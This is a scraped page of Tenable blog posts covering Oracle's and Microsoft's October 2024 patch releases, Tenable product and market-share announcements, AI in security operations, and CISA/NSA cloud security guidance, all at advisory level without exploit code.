Tenable Blog

Oracle October 2024 Critical Patch Update Addresses 198 CVEs

Tenable Blog
1 month ago

Oracle addresses 198 CVEs in its fourth quarterly update of 2024 with 334 patches, including 35 critical updates.

Background

On October 15, Oracle released its Critical Patch Update (CPU) for October 2024, the fourth and final quarterly update of the year. This CPU contains fixes for 198 CVEs in 334 security updates across 28 Oracle product families. Out of the 334 security updates published this quarter, 10.5% of patches were assigned a critical severity. High severity patches accounted for the bulk of security patches at 44.6%, followed by medium severity patches at 39.5%.

This quarter’s update includes 35 critical patches across 16 CVEs.

SeverityIssues PatchedCVEsCritical3516High14986Medium13280Low1816Total334198Analysis

This quarter, the Oracle Commerce product family contained the highest number of patches at 100, accounting for 29.9% of the total patches, followed by Oracle Hyperion at 45 patches, which accounted for 13.5% of the total patches.

A full breakdown of the patches for this quarter can be seen in the following table, which also includes a count of vulnerabilities that can be exploited over a network without authentication.

Oracle Product FamilyNumber of PatchesRemote Exploit without AuthenticationOracle Commerce10081Oracle Hyperion4512Oracle Financial Services Applications3225Oracle E-Business Suite2015Oracle Communications Applications181Oracle SQL Developer1310Oracle Food and Beverage Applications127Oracle Java SE122Oracle Secure Backup95Oracle Hospitality Applications88Oracle Autonomous Health Framework74Oracle Communications73Oracle Siebel CRM75Oracle Database Server62Oracle Systems50Oracle Essbase41Oracle MySQL44Oracle Application Express31Oracle Enterprise Manager33Oracle Fusion Middleware33Oracle Analytics31Oracle Retail Applications33Oracle Supply Chain33Oracle Graph Server and Client22Oracle PeopleSoft22Oracle Blockchain Platform11Oracle GoldenGate10Oracle NoSQL Database11Solution

Customers are advised to apply all relevant patches in this quarter’s CPU. Please refer to the October 2024 advisory for full details.

Identifying affected systems

A list of Tenable plugins to identify these vulnerabilities will appear here as they’re released. This link uses a search filter to ensure that all matching plugin coverage will appear as it is released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Tenable Security Response Team

Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources

Tenable Blog
1 month ago

Learn how data security posture management (DSPM) and AI security posture management (AI-SPM) can help you address key cloud security challenges.

The cloud has become the lifeblood of modern businesses. Its flexibility, scalability and ever-expanding range of storage technologies have fueled a data explosion. From object storage for massive media archives to NoSQL databases for real-time analytics, organizations are embracing a diverse cloud data landscape.

Artificial intelligence (AI) is another key driver behind the ever-increasing volume and variety of data stored in the cloud. As AI applications become more sophisticated, they require more data to learn and function effectively. 

Together, this creates a virtuous cycle — the more data stored and used the greater the range of AI use cases, which attract even more users. But with each new user, data type and storage solution, the cloud attack surface expands.

Traditional, perimeter-based security struggles in the dynamic world of cloud storage. Data in the cloud is constantly on the move, residing in various locations and formats. Further, with the rapid improvements in AI technology, many organizations are now using and/or creating new proprietary AI models based on their data to deliver novel insights and innovations.

How DSPM and AI-SPM can improve cloud security

The cloud’s unique challenges and opportunities for data and AI make it crucial for organizations to address the full spectrum of security responsibilities that accompany collecting, storing and using data. These responsibilities include automatically and continuously scanning data assets, discovering and monitoring sensitive data and alerting on any potential risk. To address these challenges, new solutions such as data security posture management (DSPM) and AI security posture management (AI-SPM) are becoming integral to many organizations.

Most cloud security solutions offer numerous valuable tools, but lack the proper data analysis needed to help practitioners prioritize the organization’s most sensitive assets. Though such cloud security solutions may excel at securing the cloud environment itself, they fail to address the data and AI resources residing within. Conversely, though standalone DSPM and AI-SPM services act as powerful spotlights to illuminate data and AI resources, if they’re not combined with broader cloud security measures, they can't prevent unauthorized access or breaches that exploit vulnerabilities in the cloud infrastructure. 

In order to gain robust protection for your organization, you need DSPM and AI-SPM to pinpoint your valuable data and AI resources and cloud security solutions to build a secure vault around them.

Tenable Cloud Security now offers DSPM and AI-SPM capabilities

To help organizations address their data and AI security needs, Tenable Cloud Security now has fully integrated DSPM and AI-SPM capabilities.

Source: Tenable, October 2024

Tenable Cloud Security’s integrated DSPM and AI-SPM features offer significant advantages over standalone products. Users are empowered with deep data discovery and classification, ensuring sensitive information is identified and prioritized for protection. This intrinsic visibility allows for focused security measures and simplifies compliance efforts. We’ve also further enhanced Tenable’s best-in-class cloud infrastructure entitlement management (CIEM) capabilities to enforce AI entitlement management, enabling organizations to ensure only users with the correct access policies can access proprietary AI models.

The DSPM and AI-SPM features integrated into Tenable Cloud Security, a cloud native application protection platform (CNAPP), make it a force multiplier for securing your organization. 

The future of cloud security lies in a unified approach that addresses the full spectrum of threats. CNAPPs are evolving to become the central nervous system of cloud security, offering a single pane of glass for managing vulnerabilities, workload protection and access control. The integration of DSPM and AI-SPM capabilities into Tenable Cloud Security represents a significant step toward this vision. As CNAPP platforms evolve, we can expect a future where cloud security becomes as seamless and scalable as the cloud itself.

Learn more about DSPM and AI-SPM
Liat Hayun

Cybersecurity Snapshot: How AI Can Boost Your Cybersecurity Program

Tenable Blog
1 month 1 week ago

More security teams are incorporating AI to uplevel their defense strategies and boost productivity. With so much AI buzz, it may be overwhelming to decipher which tools to acquire and how they fit in a modern security strategy. Read on to explore how AI-enabled tools can help enhance your security program in this special edition of the Tenable Cybersecurity Snapshot!

It’s clear that artificial intelligence (AI) has the potential to transform security operations by helping organizations move from traditional defense mechanisms to proactive and real-time threat detection. In essence, the role of AI in modern cybersecurity involves integrating advanced technologies to more quickly and precisely predict, identify and mitigate threats before they cause harm. 

Today, with the rise of cloud environments, the convergence of IT and operational technology (OT), generative AI-enhanced exploits and phishing lure content, the attack surface has ballooned. As a result, cybersecurity teams are looking beyond traditional methods and embracing AI security solutions to protect sensitive data. 

In fact, the recent “State of AI and Security Survey Report” from the Cloud Security Alliance (CSA) reveals a majority of security professionals (63%) believe in AI’s potential to enhance security measures. 

How strongly do you agree or disagree with the following statement: AI will improve security within our organization.

(Source: “State of AI and Security Survey Report” from the Cloud Security Alliance, April 2024)

The study, based on a survey of 2,500 IT and security pros, also found that 67% of respondents say they have tested AI specifically for security purposes, and 48% say they are either “very” or “reasonably” confident in their organizations’ ability to use AI for security successfully.

Meanwhile, in a commissioned study conducted by Forrester Consulting on behalf of Tenable in October 2023, 44% of IT and security leaders polled said they were either “extremely confident” or “very confident” about their ability to use generative AI to enhance their organization’s cybersecurity strategy.

 

Furthermore, 68% of respondents showed some level of interest in using GenAI to align IT/security goals with business goals; and a similar number – 67% – showed interest in using it to increase or improve the way their organization practices preventive cybersecurity.

 

So how is AI being put to use in security programs? How has generative AI affected security? In this special edition of Cybersecurity Snapshot, we examine a few of the ways AI can enhance your cybersecurity strategy.

1 - Better real-time threat detection

AI has greatly impacted real-time threat detection by analyzing large datasets at unmatched speeds and identifying subtle, often-overlooked, changes in network traffic or user behavior. For example, AI can detect when an employee’s account displays unusual activity or when a system accesses sensitive data that it typically wouldn't. Traditional tools may miss these nuanced anomalies, but AI systems are adept at spotting them.

For security, GenAI can revolutionize the field if applied correctly, especially when it comes to threat detection and response. It enhances efficiency and productivity by swiftly processing and delivering critical information when it matters most,” Nicholas Weeks, a Tenable senior product marketing manager, wrote in a recent blog post.

One of AI's significant advantages in threat detection is its ability to be proactive. AI-powered systems continuously refine their algorithms as new malware strains and attack techniques emerge, learning from each event and integrating new insights into their threat detection mechanisms. This allows them to respond to both known and unknown threats more effectively than traditional, static, signature-based tools.

 

 

"There has been automation in threat detection for a number of years, but we're also seeing more AI in general. We're seeing the large models and machine learning being applied at scale," Josh Schmidt, partner in charge of the cybersecurity assessment services team at BPM, a professional services firm, told TechTarget.

In addition to monitoring internal network behavior, AI systems can more comprehensively analyze external sources of intelligence like RSS feeds, cybersecurity forums and global threat data. This wide-reaching capability helps AI gather actionable insights and recommend defense strategies that are tailored to current attack trends. For example, AI can flag a spike in phishing attacks targeting specific industries and suggest measures to counter these emerging threats. 

Additionally, as AI-generated phishing lures become nearly impossible for humans to detect, researchers and operators are turning to AI-based systems to assess if an email was AI-generated by looking for subtle telltales or differences when compared to a legitimate human-sourced email. 

2 - Improved automated response and mitigation

AI's capability to automate responses to detected threats drastically reduces the time between identifying an anomaly and taking action. Once a threat is detected, AI-driven systems can autonomously recommend or execute mitigation steps. This may include isolating compromised systems or blocking malicious traffic — actions that minimize human intervention and reduce the risk of manual errors.

“As AI-driven incident response automation capabilities grow more sophisticated, tools will likely get better at recognizing and responding to atypical behavior without immediate human intervention — even for zero-day threats,” reads TechTarget’s article “Incident response automation: What it is and how it works.

In SANS Institute’s “SANS 2024 AI Survey: AI and Its Growing Role in Cybersecurity: Lessons Learned and Path Forward,” automated incident response ranked third among the top cybersecurity areas in which organizations are using AI, cited by 49% of respondents.

Key Areas of AI Usage

(Source: SANS Institute’s “SANS 2024 AI Survey: AI and Its Growing Role in Cybersecurity: Lessons Learned and Path Forward,” September 2024)

The benefit of AI in automated response is evident in its speed. AI can isolate a compromised system in seconds, preventing the lateral movement of an attacker within the network — a tactic cybercriminals frequently use to escalate breaches. Acting as an automated first responder, AI can handle incident responses far quicker than any human team, ensuring the organization’s operations continue with minimal disruption.

“AI systems are … capable of automatically responding to detected threats 24/7, implementing countermeasures around the clock and reducing the window of opportunity for attackers,” reads AI Business’ article “AI in Cybersecurity: Understanding the Digital Security Landscape.

Predefined playbooks for handling various types of incidents, like ransomware or phishing attacks, can also be integrated into AI-driven response systems. These playbooks ensure that the correct steps are taken in a consistent manner, reducing the possibility of human errors during a crisis. In large-scale environments, where multiple incidents may occur simultaneously, AI’s ability to handle multiple threats concurrently ensures quicker resolutions and more robust defenses.

AI-driven automation is still nascent. However, it has the potential to have a major impact on incident response.

“AI-driven automation is a game-changer for security incident response. It swiftly isolates compromised systems, blocks malicious traffic, and initiates remediation steps. This automation reduces manual intervention, ensuring a rapid, effective security event-driven response,” reads Techopedia’s “AI and Cybersecurity: Accelerate Your Defenses in 2024” article.

3 - Predictive analytics transformation

One of AI’s most powerful features is its ability to predict future threats, transforming how security teams allocate resources and prioritize their actions. In the aforementioned “SANS 2024 AI Survey,” 42% of respondents said their organizations are applying AI to predictive threat intelligence.

Predictive models, such as Tenable's Vulnerability Priority Rating (VPR), use machine learning to anticipate which vulnerabilities are most likely to be exploited within a specific timeframe, such as the next 28 days.

This foresight empowers security teams to focus their patching and mitigation efforts on the most critical vulnerabilities, ensuring that resources are used efficiently. By analyzing vast amounts of historical and real-time data, including cybersecurity news, forums, and threat intelligence, AI can provide summarizations and insights into emerging vulnerabilities. This allows for a proactive approach to threat management, enabling organizations to address vulnerabilities before they are actively exploited.

 

 

“AI and ML algorithms can predict potential threats, allowing organizations to take proactive measures to prevent attacks. Predictive analytics enable organizations to identify vulnerabilities, prioritize patching and remediation efforts, and optimize security resources,” reads the article “The Impact of Artificial Intelligence and Machine Learning on Cyber Security” from the Association for Advancing Automation.

AI automates the prediction and identification of vulnerabilities, shifting the security posture from reactive to proactive, helping organizations to stay ahead of attackers and reduce the time and cost associated with mitigating lower-priority vulnerabilities.

“AI can analyze historical data and identify patterns to predict future threats, enabling proactive defense and more effective resource allocation,” reads the article “5 Ways AI Enhances Cybersecurity” from Acceleration Economy. 

4 - Clearer, more insightful attack path analysis

AI has also transformed attack path analysis by enhancing the process and providing key insights and support that help security teams act more effectively and efficiently.

AI plays a critical role in summarizing attack paths, offering high-level overviews that simplify how an attacker could potentially exploit vulnerabilities within a network. These summaries are designed to make the information accessible, highlighting how assets, exposures, and tactics, techniques, and procedures (TTPs) might be leveraged by attackers. This is particularly helpful for decision-makers who may not have deep technical expertise but need a clear understanding of risks.

AI also provides mitigation guidance once the top attack paths have been identified through traditional analysis. By suggesting specific steps to mitigate these risks, AI helps security teams close gaps more quickly, ensuring a proactive approach to threat defense.

AI also acts as an interactive assistant, offering a virtual "mini security analyst" that can answer questions about the attack path or provide further details on individual steps. This AI assistant helps bridge the gap between complex attack path models and the actionable insights security teams need to improve their defenses.

AI complements attack path analysis by offering easy-to-understand summaries, actionable mitigation guidance, and real-time support, empowering security teams to stay one step ahead of potential threats.

To get more information, check out these two videos from Tenable:

Summarizations with AI in Tenable Attack Path Analysis

Mitigation Guidance with AI in Tenable Attack Path Analysis

5 - Stronger exposure management

AI in exposure management involves continuously monitoring an organization’s attack surface in real-time to identify vulnerabilities as they emerge. Unlike predictive analytics, which forecasts future threats, exposure management focuses on real-time detection and dynamic defense adjustments. AI can monitor system configurations, network activity, and threat intelligence feeds, providing immediate feedback on potential weaknesses.

“AI can process massive amounts of data in real time, detecting threats early and reducing potential damage. AI can identify new and evolving threats more effectively than manual methods,” wrote Kenny Mullican, CIO of Paragon Films, in the article “From Malware Detection to Predictive Analytics, 5 Ways AI Enhances Cybersecurity.

“As a CIO with a small staff, I need the cybersecurity software we use to constantly adapt to the threat landscape automatically, without my team having to constantly configure it,” he wrote.

 

 

Incorporating AI into exposure management allows for adaptive security measures that change based on new threats. For example, if AI detects a suspicious event, it can automatically tighten access controls or adjust firewall settings, ensuring that defenses are continually optimized to meet evolving risks. By allocating resources efficiently, AI ensures that critical vulnerabilities are addressed quickly, helping to maintain a strong and resilient security posture.

“AI-driven systems excel in identifying anomalies and detecting unseen attack patterns, mitigating potential risks before they escalate. For instance, real-time intelligence can be used by AI algorithms to monitor networks in real-time and accurately defend against threats as they emerge, reducing the occurrence of false positives,” reads the World Economic Forum article “The double-edged sword of artificial intelligence in cybersecurity.

“We believe the future of preventive security is Exposure Management, powered by AI,” wrote Nate Dyer, Senior Director of Product Marketing at Tenable, in a blog.

VIDEO

Making Decisions Easier with AI

6 - Streamlined incident response planning

Incident response planning, often a time-consuming process, is being streamlined by AI tools capable of analyzing historical incident data and suggesting optimized playbooks for future incidents. AI-generated playbooks offer a solid foundation for building effective response strategies, and the ability to process vast amounts of data ensures that the responses are timely and accurate.

For example, AI can triage alerts, isolate compromised systems, and block malicious traffic in real time, while also initiating forensic investigations to understand the scope of the breach. Human oversight remains essential, but AI drastically reduces the time between detecting an incident and taking action, minimizing potential damage. AI also automates communication during incidents, providing real-time updates to stakeholders and ensuring a coordinated response.

To learn more about AI security, check out these Tenable resources:

VIDEOS

Tenable CEO Amit Yoran discusses AI and preventive security on CNBC

How Generative AI is Changing Security Research: The Development of the G-3PO Tool

 

Joan Goodchild

Tenable Ranked #1 in the Device Vulnerability Management Market for the Sixth Consecutive Year in IDC's Market Shares Report

Tenable Blog
1 month 1 week ago

The research firm’s latest report also provides advice for technology suppliers that they can use to improve their vulnerability management strategy.

The IDC “Worldwide Device Vulnerability Management Market Shares, 2023”* report is out, and we’re excited to share that Tenable has once again been ranked #1 in market share for the sixth year in a row. We’re proud of this recognition, but even more, we’re honored to continue helping security professionals in the industry take control of their organization’s vulnerabilities and exposures.

In a year marked by new challenges and rapid evolution in the cybersecurity space, we believe this achievement underscores our commitment to staying ahead of threats. With 29% of the total market share and 13.6% revenue growth, Tenable continues to lead the charge in shaping the future of vulnerability management. But more importantly, we’re innovating to ensure that you have the tools you need to protect your most critical assets in today’s complex landscape.

The shift to exposure management

According to IDC, the device vulnerability management (DVM) market is evolving rapidly. What was once a focus solely on identifying and prioritizing vulnerabilities is now expanding to include broader exposure management. This shift reflects the growing need to address not just individual vulnerabilities but the entire ecosystem of potential risks, from misconfigurations to identity exposures.

At Tenable, we anticipated this evolution. That’s why our Tenable One Exposure Management Platform goes beyond vulnerability management to provide you with an all-inclusive view of your risk posture. From IT to IoT/OT devices, cloud resources and identity systems, Tenable One gives you the insights needed to understand where your exposures lie and, more importantly, how to address them effectively.

Advancing innovation with AI and automation

One of the key takeaways from the 2023 IDC report is the increased importance of artificial intelligence (AI) and automation in vulnerability management. As attack surfaces grow and threats become more sophisticated, manual processes simply can’t keep up. IDC recommends that vendors focus on automating remediation workflows and leveraging AI to enhance threat detection and prioritization.

Tenable is leading the way in this area with our ExposureAI capabilities within the Tenable One platform. Using generative AI, ExposureAI enables you to ask natural language questions, receive summaries of vulnerabilities and get actionable remediation guidance. This game-changing feature helps you not only identify risks but also understand the best path to mitigation — quickly and efficiently.

We’ve also introduced Vulnerability Intelligence, a dynamic capability that analyzes vulnerability data from over 50 trillion data points, vetted by our researchers. This ensures that your team stays ahead of emerging threats, helping you take proactive steps to mitigate potential exposures before they escalate.

Tenable is also doubling down on making remediation easier. With the recently released Exposure Response feature, security teams can create risk-based campaigns to track remediation progress. By focusing on trends in your risk posture, you can prioritize the most critical actions and ensure that vulnerabilities are addressed before they can be exploited.

Driving future innovation in cloud security

Tenable’s commitment to staying ahead of industry trends extends beyond traditional device vulnerability management. We’ve strategically expanded our capabilities in cloud security through the acquisitions of Ermetic and Eureka Security, which strengthen our cloud-native application protection platform (CNAPP) offerings. As cloud environments become more integral to modern infrastructures, these acquisitions enable us to provide you with comprehensive cloud security solutions.

A look ahead: preparing you for what’s next

The cybersecurity landscape is more complex than ever, but with Tenable by your side, you’re equipped to face those challenges head-on. Whether you’re focused on traditional IT infrastructure, cloud environments or emerging technologies like AI, our solutions provide you with the visibility, intelligence and automation you need to stay one step ahead of attackers.

As we celebrate another year at the top, we remain focused on helping you navigate this ever-evolving space. Together, we’re building a more secure future.

For more insights from the IDC Market Shares 2023* report and to learn how Tenable can help you strengthen your vulnerability management strategy, check out the full report here.

*(doc #US51417424, July 2024) 

Learn more
Brittany Isaacs

Microsoft’s October 2024 Patch Tuesday Addresses 117 CVEs (CVE-2024-43572, CVE-2024-43573)

Tenable Blog
1 month 1 week ago
  1. 3Critical
  2. 113Important
  3. 1Moderate
  4. 0Low

Microsoft addresses 117 CVEs with three rated as critical and four zero-day vulnerabilities, two of which were exploited in the wild.

Microsoft patched 117 CVEs in October 2024 Patch Tuesday release, with three rated critical, 113 rated important and one rated moderate. Our counts omitted one vulnerability reported by Hackerone.

This month’s update includes patches for:

  • .NET and Visual Studio
  • .NET,.NET Framework, Visual Studio
  • Azure CLI
  • Azure Monitor
  • Azure Stack
  • BranchCache
  • Code Integrity Guard
  • DeepSpeed
  • Internet Small Computer Systems Interface (iSCSI)
  • Microsoft ActiveX
  • Microsoft Configuration Manager
  • Microsoft Defender for Endpoint
  • Microsoft Graphics Component
  • Microsoft Management Console
  • Microsoft Office
  • Microsoft Office Excel
  • Microsoft Office SharePoint
  • Microsoft Office Visio
  • Microsoft Simple Certificate Enrollment Protocol
  • Microsoft WDAC OLE DB provider for SQL
  • Microsoft Windows Speech
  • OpenSSH for Windows
  • Outlook for Android
  • Power BI
  • RPC Endpoint Mapper Service
  • Remote Desktop Client
  • Role: Windows Hyper-V
  • Service Fabric
  • Sudo for Windows
  • Visual C++ Redistributable Installer
  • Visual Studio
  • Visual Studio Code
  • Windows Ancillary Function Driver for WinSock
  • Windows BitLocker
  • Windows Common Log File System Driver
  • Windows Cryptographic Services
  • Windows EFI Partition
  • Windows Hyper-V
  • Windows Kerberos
  • Windows Kernel
  • Windows Kernel-Mode Drivers
  • Windows Local Security Authority (LSA)
  • Windows MSHTML Platform
  • Windows Mobile Broadband
  • Windows NT OS Kernel
  • Windows NTFS
  • Windows Netlogon
  • Windows Network Address Translation (NAT)
  • Windows Online Certificate Status Protocol (OCSP)
  • Windows Print Spooler Components
  • Windows Remote Desktop
  • Windows Remote Desktop Licensing Service
  • Windows Remote Desktop Services
  • Windows Resilient File System (ReFS)
  • Windows Routing and Remote Access Service (RRAS)
  • Windows Scripting
  • Windows Secure Channel
  • Windows Secure Kernel Mode
  • Windows Shell
  • Windows Standards-Based Storage Management Service
  • Windows Storage
  • Windows Storage Port Driver
  • Windows Telephony Server
  • Winlogon

Remote code execution (RCE) vulnerabilities accounted for 35.9% of the vulnerabilities patched this month, followed by elevation of privilege (EOP) vulnerabilities at 23.9%.

ImportantCVE-2024-43572 | Microsoft Management Console Remote Code Execution Vulnerability

CVE-2024-43572 is a RCE vulnerability in Microsoft Management Console (MMC). It was assigned a CVSSv3 score of 7.8 and is rated as important. An attacker could exploit this vulnerability by convincing a vulnerable target through the use of social engineering tactics to open a specially crafted file. Successful exploitation would allow the attacker to execute arbitrary code. According to Microsoft, CVE-2024-43572 was exploited in the wild as a zero-day. This is the second month in a row that Microsoft patched a RCE vulnerability in the MMC, as Microsoft addressed CVE-2024-38259 in its September 2024 Patch Tuesday release.

As part of its patch for CVE-2024-43572, Microsoft has altered the behavior for Microsoft Saved Console (MSC) files, preventing untrusted MSC files from being opened on a system.

ModerateCVE-2024-43573 | Windows MSHTML Platform Spoofing Vulnerability

CVE-2024-43573 is a spoofing vulnerability in the Windows MSHTML Platform. It was assigned a CVSSv3 score of 6.5 and is rated as moderate. An unauthenticated, remote attacker could exploit this vulnerability by convincing a potential target to open a malicious file. According to Microsoft, CVE-2024-43573 was exploited in the wild as a zero-day.

This is the fourth zero-day vulnerability in the Windows MSHTML Platform that was exploited in the wild in 2024, which include CVE-2024-30040, a security feature bypass flaw that was patched in May 2024, CVE-2024-38112, a spoofing vulnerability that was patched in July 2024 and CVE-2024-43461, a spoofing vulnerability that was patched on September 10, 2024, though details about in-the-wild exploitation was not known until September 13, 2024. Both CVE-2024-38112 and CVE-2024-43461 were used as part of an exploit chain by an advanced persistent threat (APT) actor known as Void Banshee.

ImportantCVE-2024-20659 | Windows Hyper-V Security Feature Bypass Vulnerability

CVE-2024-20659 is a security feature bypass vulnerability in Windows Hyper-V. It was assigned a CVSSv3 score of 7.1, is rated as important and assessed as “Exploitation Less Likely” according to Microsoft’s Exploitability Index. This is likely due to the fact that there are multiple conditions that need to be met in order for exploitation to be feasible, such as a user rebooting their machine and application specific behavior among other user-required actions. Successful exploitation would allow an attacker to bypass a Virtual Machine’s Unified Extensible Firmware Interface (UEFI) on the host machine, resulting in both the hypervisor and secure kernel being compromised. According to Microsoft, CVE-2024-20659 was publicly disclosed prior to a patch being made available.

In addition to CVE-2024-20659, Microsoft also addressed three denial of service (DoS) vulnerabilities and one RCE in Windows Hyper-V:

CVEVulnerability TypeSeverityCVSSv3CVE-2024-30092RCEImportant8CVE-2024-43521DoSImportant7.5CVE-2024-43567DoSImportant7.5CVE-2024-43575DoSImportant7.5ImportantCVE-2024-43583 | Winlogon Elevation of Privilege Vulnerability

CVE-2024-43583 is an EoP vulnerability in Winlogon. It was assigned a CVSSv3 score of 7.8 and is rated as important. A local, authenticated attacker could exploit this vulnerability to gain SYSTEM privileges. According to Microsoft, CVE-2024-43583 was publicly disclosed prior to a patch being made available.

In addition to applying the available patch for CVE-2024-43583, Microsoft recommends enabling Microsoft first-party Input Method Editor (IME) in order to thwart vulnerabilities within third-party IMEs. For more information on enabling first-party IME, please refer to the knowledge base article KB5046254.

ImportantCVE-2024-38212, CVE-2024-38261, CVE-2024-38265, CVE-2024-43453, CVE-2024-43549, CVE-2024-43564, CVE-2024-43589, CVE-2024-43592, CVE-2024-43593, CVE-2024-43607, CVE-2024-43608, CVE-2024-43611 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability

CVE-2024-38212, CVE-2024-38261, CVE-2024-38265, CVE-2024-43453, CVE-2024-43549, CVE-2024-43564, CVE-2024-43589, CVE-2024-43592, CVE-2024-43593, CVE-2024-43607, CVE-2024-43608 and CVE-2024-43611 are a series of RCE vulnerabilities in Windows Routing and Remote Access Service (RRAS) accounting for 10% of the vulnerabilities in the October Microsoft Patch Tuesday update. All 12 of these vulnerabilities share a common CVSSv3 score of 8.8 with the exception of CVE-2024-38261 which was assigned a score of 7.8. Each of these vulnerabilities are rated by Microsoft as “Exploitation Less Likely” and share similar attack paths based on Microsoft's descriptions of the vulnerabilities. An attacker with no authentication could leverage this vulnerability by targeting a vulnerable server with a specially crafted protocol message or tricking a user to submit a request to a malicious server resulting in a malicious message being returned, which could lead to RCE on the vulnerable machine.

ImportantCVE-2024-43533 and CVE-2024-43599 | Remote Desktop Client Remote Code Execution Vulnerability

CVE-2024-43533 and CVE-2024-43599 are a pair of RCE vulnerabilities in Microsoft Remote Desktop Client, both with a CVSSv3 score of 8.8 and flagged by Microsoft as “Exploitation Less Likely.” The attack vector noted by Microsoft lists a prerequisite of an attacker first compromising a Remote Desktop Server. Once compromised, the attacker can leverage RCE against vulnerable connecting devices. As a mitigating factor and part of security best practices, it is suggested that the Remote Desktop service should be disabled if not needed. Microsoft’s advisory further explains that disabling unused services can help reduce exposure.

CriticalCVE-2024-43468 | Microsoft Configuration Manager Remote Code Execution Vulnerability

CVE-2024-43468 is a RCE in Microsoft Configuration Manager listed as “Exploitation Less Likely” by Micorosft despite having a critical CVSSv3 score of 9.8, the highest in October's Patch Tuesday update. An attacker can leverage this vulnerability without prior authentication by sending a specially crafted request to a vulnerable machine resulting in RCE on the machine or its underlying database.

Microsoft has advised impacted users to install an in-console update as the only mitigation path, but has listed a workaround for users who cannot immediately implement the updates. The workaround suggested by Microsoft is to use an alternate service account for the Management point connection account in place of the default “Computer” account.

ImportantCVE-2024-38124 | Windows Netlogon Elevation of Privilege Vulnerability

CVE-2024-38124 is a EoP vulnerability in Windows Netlogon assessed as “Exploitation Less Likely” with a CVSSv3 score of 9, the second highest in the October Patch Tuesday update. An attacker would need authenticated access to the same network as a vulnerable device and rename their machine to match the domain controller in order to establish a secure channel. If these prerequisites are met, the attacker would then need to rename their machine back to its original name and “once the new domain controller is promoted, the attacker could use the secure channel to impersonate the domain controller and potentially compromise the entire domain.”

There are no workarounds listed for this vulnerability, but if immediate patching is not an option, Microsoft has listed a handful of mitigating factors to consider:

  • Avoid using predictable naming conventions on Domain Controllers
  • Ensure Secure Channel validation requires more than just a matching computer name.
  • Monitoring for the renaming of computers within the network.
  • Consider enhanced authentication mechanisms.
Tenable Solutions

A list of all the plugins released for Microsoft’s October 2024 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.

Get more information

Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Tenable Security Response Team

CISA and NSA Cloud Security Best Practices: Deep Dive

Tenable Blog
1 month 1 week ago

Recent cloud security guidance from CISA and the NSA offers a wealth of recommendations to help organizations reduce risk. This blog highlights key takeaways, provides further insights from CIS, and explores how utilizing cloud security posture management (CSPM) and cloud-native application protection program (CNAPP) solutions/services from Tenable can help.

This past spring, Tenable reported that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) released five best practices documents (found here) that focus on cloud computing cybersecurity. This release was an effort to encourage stronger security measures for organizations with a computing presence in cloud-first, multi-cloud or hybrid environments. These cybersecurity information sheets (CSIs) include numerous specific measures to reduce risk overall, covering some of the most important attack vectors facing cloud computing services.

What’s this all about?

Each of the CSIs focus on a specific cloud service (or suite of services), first identifying the threat and then the MITRE ATT&CK tactics/techniques used by threat actors. They continue by providing detailed guidance on ways to help with reducing the risk of threat actors finding an opening. The best practices align with recommendations that other organizations touch on, such as the Center for Internet Security (CIS) cloud foundations benchmarks. The content in the CSIs underscores the importance of concepts such as least privilege, limiting attack surface area and centralizing logs for auditing purposes, as well as the use of tools like key management services (KMS), multi-factor authentication (MFA), and modern encryption protocols.

Each of the joint CSIs will be summarized below, with some useful information that organizations looking to start or secure a cloud presence can actively use today.

Use Secure Cloud Identity and Access Management Practices

The identity and access management (IAM) document outlines the best practices for access controls, which are central to any good security program but are especially important when developing a public cloud computing environment.

The document highlights several MITRE tactics and techniques malicious actors use when trying to gain access to any environment, but cloud environments that have public-facing access make for an easier target. If the actor wants to gain access, they can use phishing techniques and target accounts that don’t have active MFA. It goes on to outline key considerations of risks once the actor is in the door, and how concepts such as least privilege and separation of duties for access controls can help. TL;DR: drop down to the Best Practices section for a recap on all the best stuff.

What this document does well is speak to critical controls that other organizations, such as CIS, have also spoken to with its cloud foundations benchmarks, and in doing so lends more authority to the benchmark content. Within the cloud foundations content, CIS includes numerous recommendations on controls to help secure access in cloud environments; some examples of these access control recommendations are:

Use Secure Cloud Key Management Practices

Next, the CISA/NSA documents cover encryption methodologies, including how to best maintain secure keys and address secrets management. There are definitely tie-ins to the IAM controls with regards to how services accounts authenticate and what those accounts can do when they gain access. Coupled with a well-planned IAM strategy, utilizing KMS in a cloud service provider (CSP) is crucial for smooth and secure infrastructure and operations.

Early in this document you’ll find several important items to consider when setting up a KMS strategy, and while the IAM and KMS functions may differ across CSPs many of these considerations are universal. As such, they will also be found in corresponding CIS benchmark recommendations. This guidance can be found in recommendations on protecting keys (access controls), key/secret rotation and logging/monitoring key usage.

As the document continues, there is a section on where a KMS fits into the most popular cloud service models (ie: infrastructure as a service, platform as a service, or software as a service) and how MITRE classifies the tactics/techniques used by an attacker to gain access or operate once they’re in the door. There is also another best practices summary that highlights key points when implementing and using a KMS solution. Here are some examples of key management recommendations in the CIS cloud foundations benchmarks:

Implement Network Segmentation and Encryption in Cloud Environments

Segmentation has become a hot topic in recent years with the introduction of micro-segmentation in data centers, as well as with every authority on network security highlighting the necessity of a “deny by default” firewall strategy. This document speaks to those concepts, but also adds encryption in transit to the conversation as the best way to secure data moving across the network or internet when that transit is necessary. After all, it’s always best to not only prevent attackers from accessing an environment, but also ensure that even if they get through the door, they can’t see anything important.

The document details specific recommendations for encrypted communication channels using transport layer security (TLS) 1.2 or greater for application protocols, an IPsec virtual private network (VPN) rather than TLS-based VPNs, and even private connectivity directly to the CSP. Traffic between services, to/from external parties, or between a user and a service should all be encrypted and as isolated as possible. Private access points are available for many of the common services used in the major CSPs, and role-based access control (RBAC) or attribute-based access control (ABAC) can be utilized to limit what that access can do in the environment.

The network segmentation sections detail the importance of network and workload isolation, as it helps prevent lateral movement if an attacker gains access to one system or service. The writers effectively explain the differences between micro- and macro-segmentation, why macro is considered the minimum necessary, and how micro-segmentation is the ideal that organizations should try to reach. Network security engineers have seen this guidance expanded over recent years and the examples given help bridge the gap between the data center and cloud environment.

